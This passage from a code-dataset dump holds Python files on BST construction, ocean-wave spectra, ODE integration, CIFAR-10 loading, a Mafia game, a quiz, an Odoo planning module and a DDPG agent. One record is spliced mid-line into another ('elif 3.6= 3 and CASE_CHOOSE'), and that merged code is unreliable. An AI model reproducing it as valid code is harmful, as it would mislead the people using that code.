nums, root, ind, left, right):\n if left < ind:\n i = (left + ind - 1) / 2\n root.left = TreeNode(nums[i])\n self.toBST(nums, root.left, i, left, ind - 1)\n if right > ind:\n i = (ind + 1 + right) / 2\n root.right = TreeNode(nums[i])\n self.toBST(nums, root.right, i, ind + 1, right)\n\n","sub_path":"q108.py","file_name":"q108.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"306168293","text":"# engineering/subsea_pipeline/mechanics/freespans_VIV\n# 2011_thesis_VIV_506763.pdf\n# p 16\nimport numpy as np\nimport scipy.optimize\nimport matplotlib.pyplot as plt\n\ndef wave_velocity(H, T, depth, z, grav_acc=9.81): \n omega = 2*np.pi/T\n print(\"omega=\", omega)\n k = omega**2/grav_acc\n print(\"k=\", k)\n _lambda = 2*np.pi/k\n print(\"lambda=\", _lambda)\n u_w = np.pi*H/T * np.cosh(k*(z+depth))/np.sinh(k*depth)\n return u_w\n\ndef phillips_constant(H_s, omega_p, gamma, grav_acc=9.81):\n phillips = 5/16 * H_s**2 * omega_p**4 / grav_acc**2 *(1-0.287*np.log(gamma))\n return phillips\n\ndef JONSWAP(omega, H_s, T_p, grav_acc=9.81, gamma=None):\n omega_p = 2*np.pi/T_p\n sigma = np.full(omega.shape, 0.09)\n sigma[omega<=omega_p] = 0.07\n phi = T_p / np.sqrt(H_s)\n if not gamma:\n if phi<=3.6:\n gamma = 5\n elif 3.6= 3 and CASE_CHOOSE <= 7:\n z = r[2]\n fxd = 10*(y-x)\n if CASE_CHOOSE == 3:\n fyd = x*(28-z)-y\n elif CASE_CHOOSE == 4:\n fyd = x*(24-z)-y\n elif CASE_CHOOSE == 5:\n fyd = x*(20-z)-y\n elif CASE_CHOOSE == 6:\n fyd = x*(10-z)-y\n elif CASE_CHOOSE == 7:\n fyd = x*(0.5-z)-y\n fzd = x*y-8/3*z\n return np.array([fxd,fyd,fzd],float)\n else:\n raise ValueError('CASE_CHOOSE must be in the set {0,1,2,3,4,5,6,7}')\n return np.array([fxd, fyd], float)\n\nxpoints, ypoints = [], []\nzpoints = []\nif CASE_CHOOSE == 0:\n # Time step\n h=0.001\n # t series\n tpoints = np.arange(0, 20, h)\n # Initial value\n r = np.array([4, 2], float)\n jump = 50;\nelif CASE_CHOOSE == 1:\n h=0.001\n tpoints = np.arange(0, 30, h)\n r = np.array([1, 0.5], float)\n jump = 10;\nelif CASE_CHOOSE == 2:\n h=0.001\n tpoints = np.arange(0, 40, h)\n r = np.array([100, 20], float)\n jump = 10;\nelif CASE_CHOOSE >= 3 and CASE_CHOOSE <= 7:\n h=0.001\n jump = 10;\n if CASE_CHOOSE == 3:\n tpoints = np.arange(0, 40, h)\n r = np.array([0, 2, 9], float)\n elif CASE_CHOOSE == 4:\n tpoints = np.arange(0, 40, h)\n r = np.array([0, 2, 9], float)\n elif CASE_CHOOSE == 5:\n tpoints = np.arange(0, 40, h)\n r = np.array([0, 2, 9], float)\n elif CASE_CHOOSE == 6:\n tpoints = np.arange(0, 8, h)\n r = np.array([0, 2, 9], float)\n elif CASE_CHOOSE == 7:\n tpoints = np.arange(0, 5, h)\n r = np.array([0, 2, 9], float)\n\nelse:\n raise ValueError('CASE_CHOOSE must be in the set {0,1,2,3,4,5,6,7}')\n\nfor t in tpoints:\n xpoints.append(r[0])\n ypoints.append(r[1])\n if len(r) == 3:\n zpoints.append(r[2])\n r += rk4(r, t, h)\n\nif len(r) == 2:\n equationdata = np.array(list(zip(tpoints[0:-1:jump],xpoints[0:-1:jump],ypoints[0:-1:jump])))\nelif len(r) == 3:\n equationdata = np.array(list(zip(tpoints[0:-1:jump],xpoints[0:-1:jump],ypoints[0:-1:jump], zpoints[0:-1:jump])))\n\nnp.savetxt('EquationData_'+str(CASE_CHOOSE)+'.txt',equationdata)\n\nif len(r) == 2:\n fig, (ax1, ax2) = plt.subplots(1, 2)\n ax1.plot(tpoints, xpoints)\n ax1.plot(tpoints, ypoints)\n ax1.set_title('time evol')\n ax2.plot(xpoints, ypoints)\n ax2.set_title('phase')\n if not os.path.exists('pdf'):\n os.makedirs('pdf')\n fig.savefig('pdf/lv{}.pdf'.format(CASE_CHOOSE), bbox_inches='tight')\n plt.show()\nelif len(r) == 3:\n\n fig = plt.figure(figsize=(12, 4), facecolor='white')\n ax1 = fig.add_subplot(321, frameon=False)\n ax2 = fig.add_subplot(323, frameon=False)\n ax3 = fig.add_subplot(325, frameon=False)\n ax4 = fig.add_subplot(322, frameon=False)\n ax5 = fig.add_subplot(324, frameon=False)\n ax6 = fig.add_subplot(326, frameon=False)\n ax1.plot(tpoints, xpoints)\n ax2.plot(tpoints, ypoints)\n ax3.plot(tpoints, zpoints)\n ax4.plot(xpoints, ypoints)\n ax5.plot(xpoints, zpoints)\n ax6.plot(ypoints, zpoints)\n #ax1.set_title('t-x')\n #ax2.set_title('t-y')\n #ax3.set_title('t-z')\n if not os.path.exists('pdf'):\n os.makedirs('pdf')\n fig.savefig('pdf/lv{}.pdf'.format(CASE_CHOOSE), bbox_inches='tight')\n plt.show()\n","sub_path":"reaction/LV.py","file_name":"LV.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"365770776","text":"productDict = {}\n\nwhile True:\n command = input()\n if command == 'buy':\n [print(f\"{k} -> {productDict[k][0]*productDict[k][1]:.2f}\") for k in productDict.keys()]\n break\n else:\n commandSplit = command.split(' ')\n item = commandSplit[0]\n price = float(commandSplit[1])\n quantity = int(commandSplit[2])\n if item not in productDict:\n productDict[item] = [price,quantity]\n else:\n productDict[item][0] = price\n productDict[item][1] += quantity","sub_path":"Excercise Dictionaries/4_Orders.py","file_name":"4_Orders.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"41517859","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\nimport pickle\nimport platform\nimport seaborn as sns\n\ndef showPicture(x_train, y_train):\n classes = ['plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\n num_classes = len(classes)\n samples_per_classes = 7\n for y, cls in enumerate(classes):\n idxs = np.flatnonzero(y_train == y)\n idxs = np.random.choice(idxs, samples_per_classes, replace=False)\n for i, idx in enumerate(idxs):\n plt_index = i*num_classes +y + 1\n plt.subplot(samples_per_classes, num_classes, plt_index)\n plt.imshow(x_train[idx].astype('uint8'))\n plt.axis('off')\n if i == 0:\n plt.title(cls)\n plt.show()\n\ndef load_pickle(f):\n version = platform.python_version_tuple()\n if version[0] == '2':\n return pickle.load(f)\n elif version[0] == '3':\n return pickle.load(f, encoding='latin1')\n raise ValueError(\"invalid python version: {}\".format(version))\n\ndef loadCIFAR_batch(filename):\n with open(filename, 'rb') as f:\n datadict = load_pickle(f)\n x = datadict['data']\n y = datadict['labels']\n x = x.reshape(10000, 3, 32, 32).transpose(0, 3, 2, 1).astype('float')\n y = np.array(y)\n return x, y\n\ndef loadCIFAR10(root):\n xs = []\n ys = []\n for b in range(1, 6):\n f = os.path.join(root, 'data_batch_%d' % (b, ))\n x, y = loadCIFAR_batch(f)\n xs.append(x)\n ys.append(y)\n X = np.concatenate(xs)\n Y = np.concatenate(ys)\n x_test, y_test = loadCIFAR_batch(os.path.join(root, 'test_batch'))\n return X, Y, x_test, y_test\n\ndef data_validation(x_train, y_train, x_test, y_test):\n num_training = 49000\n num_validation = 1000\n num_test = 1000\n num_dev = 500\n mean_image = np.mean(x_train, axis=0)\n x_train -= mean_image\n mask = range(num_training, num_training + num_validation)\n X_val = x_train[mask]\n Y_val = y_train[mask]\n mask = range(num_training)\n X_train = x_train[mask]\n Y_train = y_train[mask]\n mask = np.random.choice(num_training, num_dev, replace=False)\n X_dev = x_train[mask]\n Y_dev = y_train[mask]\n mask = range(num_test)\n X_test = x_test[mask]\n Y_test = y_test[mask]\n X_train = np.reshape(X_train, (X_train.shape[0], -1))\n X_val = np.reshape(X_val, (X_val.shape[0], -1))\n X_test = np.reshape(X_test, (X_test.shape[0], -1))\n X_dev = np.reshape(X_dev, (X_dev.shape[0], -1))\n X_train = np.hstack([X_train, np.ones((X_train.shape[0], 1))])\n X_val = np.hstack([X_val, np.ones((X_val.shape[0], 1))])\n X_test = np.hstack([X_test, np.ones((X_test.shape[0], 1))])\n X_dev = np.hstack([X_dev, np.ones((X_dev.shape[0], 1))])\n return X_val, Y_val, X_train, Y_train, X_dev, Y_dev, X_test, Y_test\n pass\n\nif __name__ == '__main__':\n cifar10_name = '../Data/cifar-10-batches-py'\n x_train, y_train, x_test, y_test = loadCIFAR10(cifar10_name)\n print(x_train.shape)\n print(y_train.shape)\n print(x_test.shape)\n print(y_test.shape)\n showPicture(x_train, y_train)\n data_validation(x_train, y_train, x_test, y_test)","sub_path":"MachineLearning/Hinge Loss SVM/toolforData.py","file_name":"toolforData.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"365223466","text":"from abc import ABC\nfrom collections import defaultdict\nfrom sortedcontainers import SortedList\nfrom typing import Union, List, Tuple\n\nimport numpy as np\n\nfrom MafiaLogic.common import Game, TimeOfDay, Player, Team, Priority\nimport MafiaLogic\n\n\nclass MafiaGame(Game, ABC):\n def __init__(self,\n roles: List[Tuple[int, str]] = None,\n names: List[str] = None\n ):\n super().__init__()\n self._action_queue = defaultdict(list)\n self._message_buffer = []\n self._votes = []\n self._vote_counts = defaultdict(int)\n\n if names:\n names = np.random.permutation(names)\n\n i = 0\n if roles:\n for count, role in roles:\n for _ in range(count):\n name = names[i] if names else None\n player = getattr(MafiaLogic.roles, role)(\n game=self,\n player_id=i,\n name=name)\n if player.IS_UNIQUE:\n assert count == 1\n self.players[i] = player\n self.players_by_team[player.TEAM].append(player)\n self.players_by_name[player.name] = player\n i += 1\n\n def start(self):\n while not self._parse(input('')):\n pass\n\n def add_action(self, cb, priority, args=None, kwargs=None) -> None:\n self._action_queue[priority.value].append([cb, args, kwargs])\n\n def _advance(self):\n for x in self._message_buffer:\n print(x)\n self._message_buffer = []\n # noinspection PyTypeChecker\n self.time_of_day = TimeOfDay(\n (self.time_of_day.value + 1) % len(TimeOfDay))\n if self.time_of_day == TimeOfDay.Trial:\n for voter, vote in self._votes:\n print(f'{voter.name} voted for {vote}')\n self._votes = []\n winner = max(self._vote_counts.items(), key=lambda t: t[1])[0]\n self._nominee = self.get_player(winner)\n print(f'{self._nominee.name} is on trial!')\n self._vote_counts = defaultdict(int)\n elif self.time_of_day == TimeOfDay.Night:\n for voter, vote in self._votes:\n print(f'{voter.name} voted for {vote}')\n self._votes = []\n winner = max(self._vote_counts.items(), key=lambda t: t[1])[0]\n if winner:\n self._kill(self._nominee)\n print(f'{self._nominee} has been guillotined!')\n else:\n print(f'the town has decided not to guillotine {self._nominee}!')\n self._vote_counts = defaultdict(int)\n elif self.time_of_day == TimeOfDay.Morning:\n for priority in Priority:\n actions = self._action_queue[priority]\n for cb, args, kwargs in actions:\n cb(*args, **kwargs)\n self._action_queue = defaultdict(list)\n\n team = None\n for player in self.players.values():\n if team is None:\n team = player.TEAM\n else:\n if team != player.TEAM or team in [Team.NeutralBenign,\n Team.NeutralChaos,\n Team.NeutralEvil]:\n break\n\n def _kill(self, player: Player):\n del self.players[player.id]\n del self.players_by_name[player.name]\n self.players_by_team[player.TEAM].remove(player)\n self.dead_players[player.id] = player\n self.dead_players_by_name[player.name] = player\n\n def _vote(self, voter, vote):\n self._votes.append([voter, vote])\n self._vote_counts[vote] += 1\n\n def _parse(self, args: str):\n args = list(filter(''.__ne__, args.split(' ')))\n if not args:\n return\n\n if args[0] == 'action':\n try:\n player_id = int(args[1])\n except ValueError:\n player_id = args[1]\n player = self.get_player(player_id)\n action_args = args[2:]\n if self.time_of_day != TimeOfDay.Night:\n player.day_action(*action_args)\n else:\n player.at_night(*action_args)\n elif args[0] == 'advance':\n self._advance()\n elif args[0] == 'vote':\n assert self.time_of_day in [TimeOfDay.Nomination, TimeOfDay.Trial]\n try:\n player_id = int(args[1])\n except ValueError:\n player_id = args[1]\n voter = self.get_player(player_id)\n if self.time_of_day == TimeOfDay.Nomination:\n try:\n player_id = int(args[2])\n except ValueError:\n player_id = args[2]\n vote = self.get_player(player_id)\n self._vote(voter, vote)\n","sub_path":"MafiaLogic/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"209143932","text":"#!/usr/bin/python\n\n# uses the database 'score' and 'history' tables to spice things up.\nimport os\nimport time\nimport datetime\nfrom random import randint\nimport sqlite3\nconn = sqlite3.connect('/Users/kimbrel1/Dropbox/Public/JLinks/quiz.db')\ncurs = conn.cursor()\n\n## get number of questions\ncurs.execute('SELECT * FROM questions')\nresults = curs.fetchall()\ntotalQuestions = len(results)\navoid = int(totalQuestions/2) # don't ask a question again for at least this many questions\n\nnumberCorrect = 0\nnumberAttempts = 0\n\n########## FUNCTIONS ##########\n\ndef getRandom():\n \"Gets a random number, but makes sure it hasn't been picked recently\"\n success = False\n while success == False:\n randomNumber = randint(1,totalQuestions)\n found = False\n for num in avoidList:\n if num == randomNumber:\n found = True\n if found == False:\n success = True\n \n avoidList.append(randomNumber)\n avoidList.pop(0)\n return(randomNumber)\n \ndef getQuestion(n):\n curs.execute('SELECT question,answer FROM questions WHERE id=?',(n,))\n results = curs.fetchall()\n return(results)\n\ndef updateHistory(q,g,c):\n ts = time.time()\n st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n \n curs.execute('INSERT INTO history (q_id,datetime,guess,correct) VALUES(?, ?, ?, ?)', (q,st,g,c))\n conn.commit()\n \ndef addAnswer(i,a):\n \"adds an answer\"\n curs.execute('SELECT answer FROM questions WHERE id=?',(i,))\n results = curs.fetchall()\n \n newAnswer = [a];\n \n for result in results:\n newAnswer.append(result[0])\n \n updatedAnswer = ''\n for answer in newAnswer:\n updatedAnswer = updatedAnswer + \";\" + str(answer)\n \n curs.execute('UPDATE questions set answer=? where id=?', (updatedAnswer,i))\n conn.commit()\n print(\"\\nUpdated to include \" + updatedAnswer + \"\\n\")\n \ndef correctGuess(g,a):\n correct = False\n answerList = a.split(\";\")\n for answer in answerList:\n if g.lower() == answer.lower():\n correct = True\n if correct == True:\n return True\n else:\n return False\n \n########## QUIZ ##########\n\nguess = ''\navoidList = [0]*avoid\ncounter = 1\nwhile guess != 'q':\n question_id = getRandom()\n fullQuestion = getQuestion(question_id)\n question = ''\n answer = ''\n for part in fullQuestion:\n question = part[0]\n answer = part[1]\n \n guess = input(str(counter) + \". \" + question + \"\\nType your answer (or type 'q' to quit): \")\n \n isCorrect = False\n \n if guess != 'q':\n numberAttempts += 1 \n if correctGuess(guess,answer):\n print(\"\\nCorrect!! (\" + answer + \")\\n\")\n isCorrect = True\n else:\n print(\"Sorry, the correct answer is \" + answer + \"!\")\n \n ## Loop to add an answer to the database\n answerUpdate = input(\"Should your answer be included in the database for this question? Type 'y' or 'n':\")\n if answerUpdate == 'y':\n addAnswer(question_id,guess)\n isCorrect = True\n \n updateHistory(question_id,guess,isCorrect)\n if isCorrect:\n numberCorrect += 1\n \n ratioCorrect = int(1000*float(numberCorrect)/float(numberAttempts))/10\n \n input(\"Percent Correct = \" + str(ratioCorrect) + \"\\nType any key to continue...\")\n os.system('clear') \n \n else:\n print(\"Thanks for playing! You got \" + str(numberCorrect) + \" correct out of \" + str(numberAttempts))\n \n counter += 1","sub_path":"takeQuiz.py","file_name":"takeQuiz.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"309656360","text":"# -*- coding:utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError\nimport logging\n_logger = logging.getLogger(__name__)\n\n\nclass BsdEpp(models.Model):\n _name = 'bsd.epp'\n _inherit = ['mail.thread', 'mail.activity.mixin', 'portal.mixin']\n _description = 'Execution Planing Production'\n _order = 'bsd_sequence,id'\n\n name = fields.Char(string=\"Lot\", required=True, index=True, copy=False, default='New')\n bsd_description = fields.Text(string=\"Description\")\n bsd_delivery_date = fields.Date(string=\"Delivery Date\")\n bsd_scheduled_date_start = fields.Datetime(string=\"Scheduled Date Start\")\n bsd_scheduled_date_end = fields.Datetime(string=\"Scheduled Date End\")\n bsd_sequence = fields.Integer(string=\"Sequence\")\n bsd_mo_ids = fields.One2many('mrp.production', 'bsd_lot_id', string=\"MO\")\n state = fields.Selection([('draft', 'Draft'), ('plan', 'Plan'), ('fixed', 'Fixed')], default='draft')\n bsd_po_count = fields.Integer(string=\"# PO\", compute='_compute_po')\n bsd_booking_count = fields.Integer(string=\"# Booking\", compute='_compute_booking')\n bsd_check_plan = fields.Boolean(default=False)\n bsd_raw_material_ids = fields.One2many(\"stock.move\", \"bsd_lot_id\", string=\"Raw Material\", compute=\"_get_stock_move\")\n bsd_po_material_count = fields.Integer(string=\"# PO\", compute='_compute_po_material')\n bsd_check_update = fields.Char(string=\"Check Update\", compute=\"_compute_update\")\n bsd_char_stock_move = fields.Char(string='Stock move')\n\n @api.multi\n def update_po(self):\n po = self.env['purchase.order'].search([('bsd_lot_id', '=', self.id)])\n state = po.mapped('state')\n _logger.debug(state)\n for i in state:\n if i not in ['draft', 'cancel', 'sent']:\n raise UserError(\"Purchase not in draft or cancel or sent\")\n return {\n 'type': 'ir.actions.act_window',\n 'name': _(\"Update Purchase\"),\n 'res_model': 'bsd.epp.create.purchase',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'context': \"{'default_bsd_choose':'update'}\",\n 'target': 'new',\n }\n\n @api.depends('bsd_mo_ids')\n def _compute_update(self):\n _logger.debug(\"compute update\")\n for each in self:\n id_move = list()\n for mo in each.bsd_mo_ids:\n for raw in mo.move_raw_ids:\n id_move.append(raw.id)\n _logger.debug(id_move)\n if self.bsd_char_stock_move == str(id_move):\n self.bsd_check_update = \"Validated\"\n else:\n self.bsd_check_update = \"Detect Error From Source MO\"\n\n @api.multi\n def _compute_po_material(self):\n for each in self:\n _logger.debug(\"debug tại đây\")\n purchase_ids = self.env['purchase.order'].search([('bsd_lot_id', '=', each.id), ('bsd_mo_id', '=', False)])\n each.bsd_po_material_count = len(purchase_ids)\n\n @api.multi\n def view_po_material(self):\n self.ensure_one()\n domain = [('bsd_lot_id', '=', self.id), ('bsd_mo_id', '=', False)]\n return {\n 'name': _('Purchase Order'),\n 'domain': domain,\n 'res_model': 'purchase.order',\n 'type': 'ir.actions.act_window',\n 'view_mode': 'tree,form,kanban',\n 'view_type': 'form',\n 'help': _('''

    \n Click to Create for new documents\n

    '''),\n }\n\n @api.multi\n def _compute_booking(self):\n for each in self:\n booking_ids = list()\n for mo in each.bsd_mo_ids:\n booking_ids.append(mo.bsd_booking_id.id)\n booking = self.env['bsd.booking'].search([('id', 'in', booking_ids)])\n each.bsd_booking_count = len(booking)\n\n @api.multi\n def view_booking(self):\n booking_ids = list()\n for mo in self.bsd_mo_ids:\n booking_ids.append(mo.bsd_booking_id.id)\n domain = [('id', 'in', booking_ids)]\n return {\n 'name': _('Booking'),\n 'type': 'ir.actions.act_window',\n 'res_model': 'bsd.booking',\n 'view_mode': 'tree,form',\n 'view_type': 'form',\n 'domain': domain,\n }\n\n @api.multi\n def view_mo(self):\n self.ensure_one()\n return {\n 'name': _('Manufacturing Order'),\n 'res_model': 'mrp.production',\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'tree,form',\n }\n\n @api.multi\n def _compute_po(self):\n for each in self:\n _logger.debug(\"debug tại đây\")\n purchase_ids = list()\n for mo in each.bsd_mo_ids:\n purchase_ids += self.env['purchase.order'].search([('bsd_mo_id', '=', mo.id)]).ids\n # _logger.debug(purchase_ids)\n each.bsd_po_count = len(purchase_ids)\n\n @api.multi\n def view_po_package(self):\n self.ensure_one()\n mo_ids = self.bsd_mo_ids.ids\n domain = [('bsd_mo_id', 'in', mo_ids)]\n return {\n 'name': _('Purchase Order'),\n 'domain': domain,\n 'res_model': 'purchase.order',\n 'type': 'ir.actions.act_window',\n 'view_mode': 'tree,form,kanban',\n 'view_type': 'form',\n 'help': _('''

    \n Click to Create for new documents\n

    '''),\n }\n\n @api.model\n def create(self, vals):\n if vals.get('name', 'New') == 'New':\n vals['name'] = self.env['ir.sequence'].next_by_code('bsd.epp') or '/'\n return super(BsdEpp, self).create(vals)\n\n @api.multi\n def button_plan_lot(self):\n for each in self:\n each.bsd_mo_ids.button_plan()\n return True\n\n @api.multi\n def view_workorder(self):\n pass\n return {\n 'name': _('Workorder'),\n 'type': 'ir.actions.act_window',\n 'res_model': 'mrp.workorder',\n 'view_id': False,\n 'view_mode': 'gantt',\n 'view_type': 'form',\n 'context': \"{'search_default_bsd_lot_id': True}\"\n }\n\n @api.multi\n def button_plan(self):\n self.ensure_one()\n self.bsd_mo_ids.button_plan()\n self.write({\n 'state': 'plan',\n 'bsd_check_plan': True,\n })\n return True\n\n @api.multi\n def button_unplan(self):\n self.ensure_one()\n self.bsd_mo_ids.button_unplan()\n self.write({\n 'bsd_check_plan': False,\n })\n return True\n\n @api.multi\n def button_fixed(self):\n self.write({\n 'state': 'fixed',\n })\n return True\n\n @api.multi\n def _get_stock_move(self):\n for each in self:\n id_move = list()\n for mo in each.bsd_mo_ids:\n for raw in mo.move_raw_ids:\n id_move.append(raw.id)\n _logger.debug(\"get stock move\")\n _logger.debug(id_move)\n each.bsd_raw_material_ids = [(6, 0, id_move)]","sub_path":"bsd_epp/models/bsd_epp.py","file_name":"bsd_epp.py","file_ext":"py","file_size_in_byte":7219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"289681723","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 22 22:35:18 2018\n\n@author: Sumeet Bhambrah\n\nHackerrank | 30 days of coding | data types\n\n\"\"\"\n\ni = 4\nd = 4.0\ns = 'HackerRank '\n\n# Declare second integer, double, and String variables.\nii = 1\ndd = 1.0\nss = \"\"\n# Read and save an integer, double, and String to your variables.\nii = int(input())\ndd = float(input())\nss = input()\n# Print the sum of both integer variables on a new line.\nprint(\"%d\" % (i + ii))\n# Print the sum of the double variables on a new line.\nprint(\"%.1f\" % (d + dd))\n# Concatenate and print the String variables on a new line\n# The 's' variable above should be printed first.\nprint(s + ss)\n","sub_path":"hackerrank/30 days of coding/data_types.py","file_name":"data_types.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"381238","text":"# -*- coding: utf8 -*-\n\nimport multiprocessing\nimport os\nimport numpy as np\nimport tensorflow as tf\n\nfrom yarll.agents.agent import Agent\nfrom yarll.memory.memory import Memory\nfrom yarll.misc.noise import OrnsteinUhlenbeckActionNoise\nfrom yarll.misc.network_ops import batch_norm_layer, fan_in_initializer, linear_fan_in\n\nclass DDPG(Agent):\n def __init__(self, env, monitor_path: str, **usercfg) -> None:\n super(DDPG, self).__init__(**usercfg)\n self.env = env\n self.monitor_path: str = monitor_path\n\n self.config.update(\n n_episodes=100000,\n n_timesteps=env.spec.tags.get(\"wrapper_config.TimeLimit.max_episode_steps\"),\n actor_learning_rate=1e-4,\n critic_learning_rate=1e-3,\n ou_theta=0.15,\n ou_sigma=0.2,\n gamma=0.99,\n batch_size=64,\n tau=0.001,\n l2_loss_coef=1e-2,\n n_actor_layers=2,\n n_hidden_units=64,\n actor_layer_norm=True,\n critic_layer_norm=False, # Batch norm for critic does not seem to work\n replay_buffer_size=1e6,\n replay_start_size=10000 # Required number of replay buffer entries to start training\n )\n self.config.update(usercfg)\n\n self.state_shape: list = list(env.observation_space.shape)\n self.n_actions: int = env.action_space.shape[0]\n self.states = tf.placeholder(tf.float32, [None] + self.state_shape, name=\"states\")\n self.actions_taken = tf.placeholder(tf.float32, [None, self.n_actions], name=\"actions_taken\")\n self.critic_target = tf.placeholder(tf.float32, [None, 1], name=\"critic_target\")\n self.is_training = tf.placeholder(tf.bool, name=\"is_training\")\n\n with tf.variable_scope(\"actor\"):\n self.action_output, self.actor_vars = self.build_actor_network()\n\n self.target_action_output, actor_target_update = self.build_target_actor_network(self.actor_vars)\n\n self.q_gradient_input = tf.placeholder(\"float\", [None, self.n_actions], name=\"q_grad_input\")\n self.actor_policy_gradients = tf.gradients(\n self.action_output, self.actor_vars, -self.q_gradient_input, name=\"actor_gradients\")\n self.actor_train_op = tf.train.AdamOptimizer(\n self.config[\"actor_learning_rate\"],\n name=\"actor_optimizer\").apply_gradients(list(zip(self.actor_policy_gradients, self.actor_vars)))\n\n with tf.variable_scope(\"critic\"):\n self.q_value_output, self.critic_vars = self.build_critic_network()\n\n self.target_q_value_output, critic_target_update = self.build_target_critic_network(self.critic_vars)\n\n l2_loss = tf.add_n([self.config[\"l2_loss_coef\"] * tf.nn.l2_loss(var) for var in self.critic_vars])\n self.critic_loss = tf.reduce_mean(tf.square(self.critic_target - self.q_value_output)) + l2_loss\n self.critic_train_op = tf.train.AdamOptimizer(\n self.config[\"critic_learning_rate\"],\n name=\"critic_optimizer\").minimize(self.critic_loss)\n self.action_gradients = tf.gradients(self.q_value_output, self.actions_taken, name=\"action_gradients\")\n\n summaries = []\n for v in self.actor_vars + self.critic_vars:\n summaries.append(tf.summary.histogram(v.name, v))\n self.model_summary_op = tf.summary.merge(summaries)\n\n self.update_targets_op = tf.group(actor_target_update, critic_target_update, name=\"update_targets\")\n\n\n self.action_noise = OrnsteinUhlenbeckActionNoise(\n self.n_actions,\n self.config[\"ou_sigma\"],\n self.config[\"ou_theta\"]\n )\n\n self.replay_buffer = Memory(int(self.config[\"replay_buffer_size\"]))\n\n num_cpu = multiprocessing.cpu_count()\n tf_config = tf.ConfigProto(\n allow_soft_placement=True,\n inter_op_parallelism_threads=num_cpu,\n intra_op_parallelism_threads=num_cpu)\n self.session = tf.Session(config=tf_config)\n self.init_op = tf.global_variables_initializer()\n\n self.n_updates = 0\n\n self.summary_writer = tf.summary.FileWriter(os.path.join(\n self.monitor_path, \"summaries\"), tf.get_default_graph())\n\n def _initalize(self):\n self.session.run(self.init_op)\n\n def build_actor_network(self):\n layer1_size = 400\n layer2_size = 300\n\n x = self.states\n if self.config[\"actor_layer_norm\"]:\n x = batch_norm_layer(x, training_phase=self.is_training, scope_bn=\"batch_norm_0\", activation=tf.identity)\n with tf.variable_scope(\"L1\"):\n x, l1_vars = linear_fan_in(x, layer1_size)\n if self.config[\"actor_layer_norm\"]:\n x = batch_norm_layer(x, training_phase=self.is_training, scope_bn=\"batch_norm_1\", activation=tf.nn.relu)\n with tf.variable_scope(\"L2\"):\n x, l2_vars = linear_fan_in(x, layer2_size)\n if self.config[\"actor_layer_norm\"]:\n x = batch_norm_layer(x, training_phase=self.is_training, scope_bn=\"batch_norm_2\", activation=tf.nn.relu)\n\n with tf.variable_scope(\"L3\"):\n W3 = tf.Variable(tf.random_uniform([layer2_size, self.n_actions], -3e-3, 3e-3), name=\"w\")\n b3 = tf.Variable(tf.random_uniform([self.n_actions], -3e-3, 3e-3), name=\"b\")\n action_output = tf.tanh(tf.nn.xw_plus_b(x, W3, b3))\n l3_vars = [W3, b3]\n\n return action_output, l1_vars + l2_vars + l3_vars\n\n def build_target_actor_network(self, actor_vars: list):\n ema = tf.train.ExponentialMovingAverage(decay=1 - self.config[\"tau\"])\n target_update = ema.apply(actor_vars)\n target_net = [ema.average(v) for v in actor_vars]\n\n x = self.states\n if self.config[\"actor_layer_norm\"]:\n x = batch_norm_layer(\n x, training_phase=self.is_training, scope_bn=\"target_batch_norm_0\", activation=tf.identity)\n\n x = tf.nn.xw_plus_b(x, target_net[0], target_net[1])\n if self.config[\"actor_layer_norm\"]:\n x = batch_norm_layer(\n x, training_phase=self.is_training, scope_bn=\"target_batch_norm_1\", activation=tf.nn.relu)\n x = tf.nn.xw_plus_b(x, target_net[2], target_net[3])\n if self.config[\"actor_layer_norm\"]:\n x = batch_norm_layer(\n x, training_phase=self.is_training, scope_bn=\"target_batch_norm_2\", activation=tf.nn.relu)\n\n action_output = tf.tanh(tf.nn.xw_plus_b(x, target_net[4], target_net[5]))\n\n return action_output, target_update\n\n def build_critic_network(self):\n layer1_size = 400\n layer2_size = 300\n\n x = self.states\n with tf.variable_scope(\"L1\"):\n if self.config[\"critic_layer_norm\"]: # Defaults to False (= don't use it)\n x = batch_norm_layer(x, training_phase=self.is_training,\n scope_bn=\"batch_norm_0\", activation=tf.identity)\n x, l1_vars = linear_fan_in(x, layer1_size)\n x = tf.nn.relu(x)\n with tf.variable_scope(\"L2\"):\n W2 = tf.get_variable(\n \"w\", [layer1_size, layer2_size], initializer=fan_in_initializer(layer1_size + self.n_actions))\n W2_action = tf.get_variable(\n \"w_action\", [self.n_actions, layer2_size], initializer=fan_in_initializer(layer1_size + self.n_actions))\n b2 = tf.get_variable(\n \"b\", [layer2_size], initializer=fan_in_initializer(layer1_size + self.n_actions))\n x = tf.nn.relu(tf.matmul(x, W2) + tf.matmul(self.actions_taken, W2_action) + b2)\n with tf.variable_scope(\"L3\"):\n W3 = tf.Variable(tf.random_uniform([layer2_size, 1], -3e-3, 3e-3), name=\"w\")\n b3 = tf.Variable(tf.random_uniform([1], -3e-3, 3e-3), name=\"b\")\n q_value_output = tf.nn.xw_plus_b(x, W3, b3, name=\"q_value\")\n\n return q_value_output, l1_vars + [W2, W2_action, 